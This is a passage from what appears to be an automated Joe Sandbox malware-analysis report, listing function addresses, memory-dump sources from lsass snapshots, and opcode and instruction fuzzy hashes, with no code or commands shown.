Instruction ID: 1e3023b37c7186add5cd263697ca92f98d8d2eb5fe2456b68f94e1f305ba2f7e
Opcode Fuzzy Hash: 95cc725e76f599b8ecf1cd44ca0b39655fbb9e86d20c028c1a75bc04759e0c0c
Instruction Fuzzy Hash: E1415622B0C5590EE318F7BCA4A5AFE7781EF59339B0446FBE44DCB1E7CD14A8818280

Function 00007FFD9BA90910 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 106ddab84ebe57319ed5d2012563e6c3502c8b20a43e772d4709404776aea820
Instruction ID: 13788493888e99767b25a02060ac8a2b4a69ae29cf994d363370a63e47415c40
Opcode Fuzzy Hash: 106ddab84ebe57319ed5d2012563e6c3502c8b20a43e772d4709404776aea820
Instruction Fuzzy Hash: 65413926B0C5590EE318F7BCA4A59F97781EF5D339B0446BBE44DCB1E7DD14A881C284

Function 00007FFD9BE85637 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b311b8676a58fe5bf420bddb029af420e50172e8b198dd81c5a7f2e4022ef09e
Instruction ID: bf8d6542d553f5810804998f8ada818e9ee8ded79c32ac4a94d7e267a5eaf48c
Opcode Fuzzy Hash: b311b8676a58fe5bf420bddb029af420e50172e8b198dd81c5a7f2e4022ef09e
Instruction Fuzzy Hash: BD415531B0CD098FDB58EF28C495DA5B7E1FB68324B4441AAD45AC75A2DE31EC45CB81

Function 00007FFD9BE80497 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89d12ba8345b0e17be08c577777729e0931f9d913f025e704b809dde03624b5c
Instruction ID: 5c543be1dc479db861910a3f5a35b512b6f802b1c09637223638eef748910f66
Opcode Fuzzy Hash: 89d12ba8345b0e17be08c577777729e0931f9d913f025e704b809dde03624b5c
Instruction Fuzzy Hash: 73414F3260DD098FDF98EB58D4A5DA573E1FFAC320B0401AAD05EC75A2DE35E845CB91

Function 00007FFD9BE856E1 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a674f3797fc98eafc300e6467eb9964b04200d35db98b912c35bf10a0f92cf88
Instruction ID: bb7e99a099525a581802920b718dbc5bf6773ad63f74db9a53f193260fd42d3c
Opcode Fuzzy Hash: a674f3797fc98eafc300e6467eb9964b04200d35db98b912c35bf10a0f92cf88
Instruction Fuzzy Hash: 0F31A331A0C9098FDB58EF2CC4A5D65B3E1FF68320B0442AAE45AC75A2DE31EC45CB81

Function 00007FFD9BE80541 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35ba228337c6ac5ff0abb0324f5f5a1ca6ea18930529584efee23b520ce2053f
Instruction ID: 780511e8a010f782ad3528d997469e619b8ca720206af2663da7ead20c28a947
Opcode Fuzzy Hash: 35ba228337c6ac5ff0abb0324f5f5a1ca6ea18930529584efee23b520ce2053f
Instruction Fuzzy Hash: 65316F3160CD498FDB5CEB18C4A5EA573E1FFAD310B0406AAD05AC75A2DE35E845CB91

Function 00007FFD9BA90960 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2a5dc1d4249125d37608e0b607d44974d0caa960de2f5dd931ee0960727c4ef
Instruction ID: 548eef4ceab8e2e645edf673f8f6d03e74babe0b2712ba4f182ecf4617c8da90
Opcode Fuzzy Hash: a2a5dc1d4249125d37608e0b607d44974d0caa960de2f5dd931ee0960727c4ef
Instruction Fuzzy Hash: 0D31F526B1C9190FE768B76C6466AF973C1EF5C32AB4445BBE40EC71E7DD28AC418284

Function 00007FFD9BE8E9CD Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ece63fd8834e68974415f99d4ee01362524f66e9fbb39f037e11d41e42816ad2
Instruction ID: 7b4c683f56da160057f7464b5088ffb8c8741fd2bbf4ad82a106b95f707256a1
Opcode Fuzzy Hash: ece63fd8834e68974415f99d4ee01362524f66e9fbb39f037e11d41e42816ad2
Instruction Fuzzy Hash: B6310342A0FFC94FD76246B81C28061BFA0EF5365030D42FFE0E4AA5E7D959AD098383

Function 00007FFD9BE8567B Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc0caa7e940b296c731463ae89cd1755471f7bd4514f8f2ca668ad2687ac141c
Instruction ID: 12331988491dfd77cf4cc4d5cb3b940caedd6c1984877fb8fc2c4fa273c09806
Opcode Fuzzy Hash: cc0caa7e940b296c731463ae89cd1755471f7bd4514f8f2ca668ad2687ac141c
Instruction Fuzzy Hash: F8318631B0CD098FDB58EF28C4A5DA5B7E1FF68320B0445AAE05AC75A2DE35EC45CB81

Function 00007FFD9BE804DB Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4b8fc8b4762bfc8cf8f581ee6eb518fcb9387e6edc035f574669a56374d56ef
Instruction ID: d5272ea6a9f2b401d23750f827637aa4d15afa0f40eeb49d62829f5873ef67b2
Opcode Fuzzy Hash: e4b8fc8b4762bfc8cf8f581ee6eb518fcb9387e6edc035f574669a56374d56ef
Instruction Fuzzy Hash: 13314F3160CD498FDB6CEB18C4A5EA573E1FFAC310B0405AAD05AC75A2DE35E885CB81

Function 00007FFD9BE85445 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4a38ac8a095c755906e60d6c42a23a6b64416192fca638e411dc8b698957d6f
Instruction ID: 01084c9037e83b16af298c283c2331a210535a584b9afb92a06cbc49457778c8
Opcode Fuzzy Hash: d4a38ac8a095c755906e60d6c42a23a6b64416192fca638e411dc8b698957d6f
Instruction Fuzzy Hash: 38313A30A1ED0E8FEBA4DB9884625BD77F5FF44301F510076E02FC21A1DE3A6A408741

Function 00007FFD9BE802A5 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eeb348208624ca5af34db1729f23db543915a770ea1cb36e53b20c9f2a4c4dd5
Instruction ID: 496f957b73e811004370d786302976526ec0ec5c4b42537814f09f4599586767
Opcode Fuzzy Hash: eeb348208624ca5af34db1729f23db543915a770ea1cb36e53b20c9f2a4c4dd5
Instruction Fuzzy Hash: 0A315D30A1EE4ECFEBA8DB9484615BD77B4FF48701F51017AD02DD61A2DB3A6E408745

Function 00007FFD9BA90998 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34c8da40faec077f56f286421578234f5890c2f573e30e3ae647ce5c0ec29b3c
Instruction ID: 7c60597881b88a0f706268f629c7beef1f634a3a23d210459072ba8f61b560db
Opcode Fuzzy Hash: 34c8da40faec077f56f286421578234f5890c2f573e30e3ae647ce5c0ec29b3c
Instruction Fuzzy Hash: 5F215E25B1891D0FF758F76C9469A7A72C2EF9C325F4501BEE40DC32E7DD24AC418281

Function 00007FFD9BE82873 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23a2b4beb138c76a9e89eb363a86e23c3938aa22c73eb950cefac8528645c555
Instruction ID: 81ea7882b3bc33dbeeeef4713c56f8bfff0a60a03a7c16206fc72543bba0cd03
Opcode Fuzzy Hash: 23a2b4beb138c76a9e89eb363a86e23c3938aa22c73eb950cefac8528645c555
Instruction Fuzzy Hash: 16210521B0DF8D4FEB65D7E8A8622F87BD5EF45314F550179D0ADC31D3D929AA068340

Function 00007FFD9BE827B4 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fb9ff4172bc11ce7e3965d054f738bc2b963b6fff6c1bcadfecae2ea9db870f
Instruction ID: ebc10efea5b6949257855ffb18dd387eb726d7a97518ad3fdeea21c29cadb5e9
Opcode Fuzzy Hash: 5fb9ff4172bc11ce7e3965d054f738bc2b963b6fff6c1bcadfecae2ea9db870f
Instruction Fuzzy Hash: F431AE31B0DE0A5FDB54DBA8D4A19B8FBA2FF84310B554239D45ED3692DB24B912CB80

Function 00007FFD9BE84331 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7f7db0ef04f610861b2fbd2797d1c5e152771951485161573423b31fd4dac81
Instruction ID: fa9576eec4d6eeacca7769a601b06357ed1ca18b84b308ba5b2896f3a65845b4
Opcode Fuzzy Hash: c7f7db0ef04f610861b2fbd2797d1c5e152771951485161573423b31fd4dac81
Instruction Fuzzy Hash: C7319D10A1EDDA4BE339836848745B47F75EF4130171946BED0AACB0E7D83DBA81C341

Function 00007FFD9BA90C25 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29fef8f86bbf9a350ac0f1ec4128e11d1e117bcb762432f8de5e7cc9ba27a418
Instruction ID: 08b0a0911856f64c9492e27a03bf273ee56e79f7105b0cd581cce5714708eecf
Opcode Fuzzy Hash: 29fef8f86bbf9a350ac0f1ec4128e11d1e117bcb762432f8de5e7cc9ba27a418
Instruction Fuzzy Hash: DA212736B0D28D8FE732E7A89C650DC3B60EF42365F0542B3D058DB1D3D9682646D798

Function 00007FFD9BE8D485 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e641d1654c9fa0e9f89da8d5ca255998f96eca1c29ec70776937d888c7a04d23
Instruction ID: c1d6ee6d3f3f257f5e0e142ed93661ab515d7fa5811daf52e621b951c4701b97
Opcode Fuzzy Hash: e641d1654c9fa0e9f89da8d5ca255998f96eca1c29ec70776937d888c7a04d23
Instruction Fuzzy Hash: C9210321B0EE4E4FE358EBA888A47757391EF98314F0542BAD01DC72E3CE7D69498341

Function 00007FFD9BE81732 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97d44b7594d28024286cc42bfd7a1a11ff16cc6102f3f7caa06b817875b80611
Instruction ID: 691e46dc8291761c3ff0f249405a00247b5d74ae06e4f356f19ae5eae9a42205
Opcode Fuzzy Hash: 97d44b7594d28024286cc42bfd7a1a11ff16cc6102f3f7caa06b817875b80611
Instruction Fuzzy Hash: B021E931E0591D9FDF98DB58C4A5AE9B7B1FF5C300F0001AEE01EE32A1CA35AA418B41

Function 00007FFD9BE80BE8 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cad00f4c5c58096e874aa930d4120083162faa5c2bc7fd9b293fe81caed7a300
Instruction ID: 8275acfe688128b16b995c69491e22436d057dcecb776aacd03d1295b8d9b435
Opcode Fuzzy Hash: cad00f4c5c58096e874aa930d4120083162faa5c2bc7fd9b293fe81caed7a300
Instruction Fuzzy Hash: 9E213D31E19D4E8FDB98DF98D8609ADB7B1FF58704F11017AD01AE72A1DA396D018B10

Function 00007FFD9BE826D9 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a74c48af461becce34a7f6fe4e682b4255a269e450514248d278b1451dc61f3a
Instruction ID: b872bd8c4488dad3653f1105818bcce5b87fc58344f58ac4bfd9cba1351f9e6c
Opcode Fuzzy Hash: a74c48af461becce34a7f6fe4e682b4255a269e450514248d278b1451dc61f3a
Instruction Fuzzy Hash: D3112921A0EF8D4FE73586F44C255B97FE9EF56300F05017AD059D71A2DC6D6A068391

Function 00007FFD9BE839E2 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83c444b43d895cfbd8dfec03d05658364919a4a95a7a952ec4d80d79919b0968
Instruction ID: 3f61c47dcf049320a70857ccd3a7890090ca44f3ad665d62a62f7b2907e600e8
Opcode Fuzzy Hash: 83c444b43d895cfbd8dfec03d05658364919a4a95a7a952ec4d80d79919b0968
Instruction Fuzzy Hash: 5C210170709E0A4BE399EB6890606A5B391FF54310F10827AD41EC3BE6DB39E9518784

Function 00007FFD9BE84360 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52d395f3cb77b215ecf33820cc8f0548e0be49555137969758d714880fc79098
Instruction ID: 16b210754226c6879fff88d14a01a8057f0f68fcf6353a9dfcde75196cfc6e95
Opcode Fuzzy Hash: 52d395f3cb77b215ecf33820cc8f0548e0be49555137969758d714880fc79098
Instruction Fuzzy Hash: E4110A10B2EC6E47F638865884749B47665EF54301B15467ED4AF8B4AAC83DBA809381

Function 00007FFD9BE8D4A0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d12e9ebc3bf17b57fcb89ff6422ecacdefb3f62e5bcd959149eca4bc30563e7
Instruction ID: 57b04612221f24b5e2e87de4155d847f205c9d6e54844de2d7c8d192bd2610c1
Opcode Fuzzy Hash: 1d12e9ebc3bf17b57fcb89ff6422ecacdefb3f62e5bcd959149eca4bc30563e7
Instruction Fuzzy Hash: 5811E921B09D0D4BE358FB7988A5B767295EF9C314F01427EE41EC72E6CE7D69448380

Function 00007FFD9BE915B2 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52006c514ec15dd97b16e3e69248698cd8e3973727d90764103367bd49c4065b
Instruction ID: f7df92fd32e58352237db47657938c9e563ed7410e2e34fa625e123b653fceab
Opcode Fuzzy Hash: 52006c514ec15dd97b16e3e69248698cd8e3973727d90764103367bd49c4065b
Instruction Fuzzy Hash: EA110421F0AD4A4BF3A4EA5C88B47B162C6EF98311F490174D41DC72E7DE39BDC98281

Function 00007FFD9BA93194 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be7e610c3d478b23460d19010eef8bb116d6587bc6a1a644f60da0a192d87e73
Instruction ID: d9a89bd69f1ea1e1e82894b327e464a1b100a7152356dd27a409699561e66490
Opcode Fuzzy Hash: be7e610c3d478b23460d19010eef8bb116d6587bc6a1a644f60da0a192d87e73
Instruction Fuzzy Hash: D6119421F0A90E4BEBB4DB9888646B972F1EF58711F5142B6C40DD32B1DD68AE409B40

Function 00007FFD9BA90C38 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 965c7d8d53d4c66dd90fe1a266bec856378d8d69fb433395a2ccc96c9f4234f8
Instruction ID: 183fb106f5fa3354881a26e9f7895cbcdac691f0b13e8da401fb2fbd823a4aec
Opcode Fuzzy Hash: 965c7d8d53d4c66dd90fe1a266bec856378d8d69fb433395a2ccc96c9f4234f8
Instruction Fuzzy Hash: E211E031B0E38D8FE722DBA8886509D7BB0EF42750F0641B7C094DB2A2D97416469784

Function 00007FFD9BA90C40 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 862513e0eafe662011602a6df2071eee3a24266083ef797657dedf62e80cc849
Instruction ID: 16c7f487bf9542a074d1a7f5ee7e55a304027fa212f626aad0799453856d7423
Opcode Fuzzy Hash: 862513e0eafe662011602a6df2071eee3a24266083ef797657dedf62e80cc849
Instruction Fuzzy Hash: 3E11AD35A0E38D8FE722DBA8886519D7FB0EF42750F0641F7C494DB2A2D97826499784

Function 00007FFD9BE8816C Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c38c0ecd784135cbfbe331722e12cde2d73c3ccc63ce9c93bcfba988b32c9a9d
Instruction ID: efbaa424027c0bad7f49fe3e113e7844b424ed341979ea7e98f13ee491893b21
Opcode Fuzzy Hash: c38c0ecd784135cbfbe331722e12cde2d73c3ccc63ce9c93bcfba988b32c9a9d
Instruction Fuzzy Hash: FD01B130609E0E8BDB34DF14C8A17B97790EF98300F52027AC459932F2CE3DBA419784

Function 00007FFD9BA949B6 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2ef186d99b40d4e28b4828c209fda44b75fda2e277ffbf5752b7df836eaf425
Instruction ID: e7ddea3f5e64cb0e0c2ca43367d53eff6c47184b1b1ace050d8d20c3dcd64c05
Opcode Fuzzy Hash: e2ef186d99b40d4e28b4828c209fda44b75fda2e277ffbf5752b7df836eaf425
Instruction Fuzzy Hash: BB11B13190496C8FDBA8DB04C894B9DB7B1EB58301F1585ADD40EE72A0CE75AE84CF85

Function 00007FFD9BA90C48 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d29aaad0675740fb4825a909e194ca96b65e44f09ec6c58d0e3c6eaf67779db
Instruction ID: 672595a80ccc0991d67ef8c7021a8114c6bb72a3c5533353491725dfe087d7fc
Opcode Fuzzy Hash: 1d29aaad0675740fb4825a909e194ca96b65e44f09ec6c58d0e3c6eaf67779db
Instruction Fuzzy Hash: 87019E35A0E38D8FE722DBA8886419C7FB0EF42750F1A41E7C094DB2A2D9786A45D784

Function 00007FFD9BE83260 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 396e1f3c283773694cb14a26bb744752eb010c92d3c9de13da9b687b2fc13392
Instruction ID: 551c68656e31ac82213c44d5e22d93131c9aa75c304701493b2a18bd4d0b4661
Opcode Fuzzy Hash: 396e1f3c283773694cb14a26bb744752eb010c92d3c9de13da9b687b2fc13392
Instruction Fuzzy Hash: 46017D3130DA4A4FD716CBA8D4B56E57BD0EF41320F1501BED555C75D2C659A614C780

Function 00007FFD9BE881E1 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37625c7ec51c926af631a86e0b3a21086d1f1e83a369ca7dceb5caba46f8315d
Instruction ID: 9c897b043c8c61bf0844120b3751222ef6438e0cebb149abf9c94a61b775b366
Opcode Fuzzy Hash: 37625c7ec51c926af631a86e0b3a21086d1f1e83a369ca7dceb5caba46f8315d
Instruction Fuzzy Hash: 4D01D131A49B0D8BD734DF54C491BB973A0FFA8310F11067AC046972A3CE3AA941CBC0

Function 00007FFD9BE81A42 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac8c58e04b4dd09c9758ed80dd013fea6193268895dd974cf001a767c77249e2
Instruction ID: f661d94179e635e32532556b7e4abda129e0c5a4a0c04684b993725935dc3a41
Opcode Fuzzy Hash: ac8c58e04b4dd09c9758ed80dd013fea6193268895dd974cf001a767c77249e2
Instruction Fuzzy Hash: 97F0623154F7C9AFD7228BB0C8615D93FB8EF47210B1A00E6D4A5C60A2C57D5A46C762

Function 00007FFD9BA90C50 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cccad5e2b666cc557d82a96423c474fdc7c84d1bbff54c74e68863c154308442
Instruction ID: 31d82262a9070dc54e7b15851663d8c1434f5934fbe911eeb354a48b8c92e28d
Opcode Fuzzy Hash: cccad5e2b666cc557d82a96423c474fdc7c84d1bbff54c74e68863c154308442
Instruction Fuzzy Hash: 4801BC30E0E38D8FEB21DBA4886409C7FB0AF02740F1A41E7C094DB2A2D9781A44D740

Function 00007FFD9BE8E989 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dad57465a2b1d385d4def3cf5b5529639ac70b98cfebedc5f43edd95a54ba4ec
Instruction ID: b43f2feadc0cb1d4a89029c03ddc1631565915f9f9f467d81a662ff780390494
Opcode Fuzzy Hash: dad57465a2b1d385d4def3cf5b5529639ac70b98cfebedc5f43edd95a54ba4ec
Instruction Fuzzy Hash: F1F0A021B0DF884FC76A566D4868061BFE1DB6A51134A43EFC045CB6B3ED59AC898342

Function 00007FFD9BA932CD Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
